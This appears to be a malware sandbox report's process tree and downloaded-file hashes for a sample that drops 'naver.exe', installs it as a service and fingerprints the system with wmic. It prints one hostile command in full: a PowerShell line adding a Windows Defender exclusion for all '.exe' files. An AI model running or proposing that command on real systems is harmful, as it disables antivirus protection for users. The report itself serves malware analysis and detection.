C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Add-MpPreference -ExclusionExtension '.exe' -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3976 -
C:\Users\Admin\AppData\Local\naver\naver.exeC:\Users\Admin\AppData\Local\naver\naver.exe -install5⤵
- Sets service image path in registry
- Executes dropped EXE
PID:5036
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3836,i,11391966286255097843,10588851088187498028,262144 --variations-seed-version --mojo-platform-channel-handle=4348 /prefetch:81⤵PID:1392
-
C:\Users\Admin\AppData\Local\naver\naver.exe"C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- Suspicious use of AdjustPrivilegeToken
PID:692 -
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- Suspicious use of AdjustPrivilegeToken
PID:516 -
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2216 -
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:1652
-
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:4600
-
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:1820
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2868
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
1KB
MD5e89c193840c8fb53fc3de104b1c4b092
SHA18b41b6a392780e48cc33e673cf4412080c42981e
SHA256920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c
SHA512865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.3MB
MD5c41e8324cb68c07c2bbff56d645cae53
SHA113518a95a782ea595aff1e7f15397d2968738718
SHA2564f9f9cc3996b3f8ee33b46263ad726085ee4f06520012bcfb6a2df77ecdb7917
SHA5127b2271be16d9729c32398b62299c5526dc6c9d98ef3213513554eb46f21917f50ab4b82b5e83ca83582c3b570e8a79713d2bf0779162d687aebbd3b47dd0900b
-
Filesize
22KB
MD52dd515ea546a81398d94dd15e3b4d55c
SHA1eb0b0fca721a296906166b7e972559b87353b726
SHA256becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2
SHA512439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb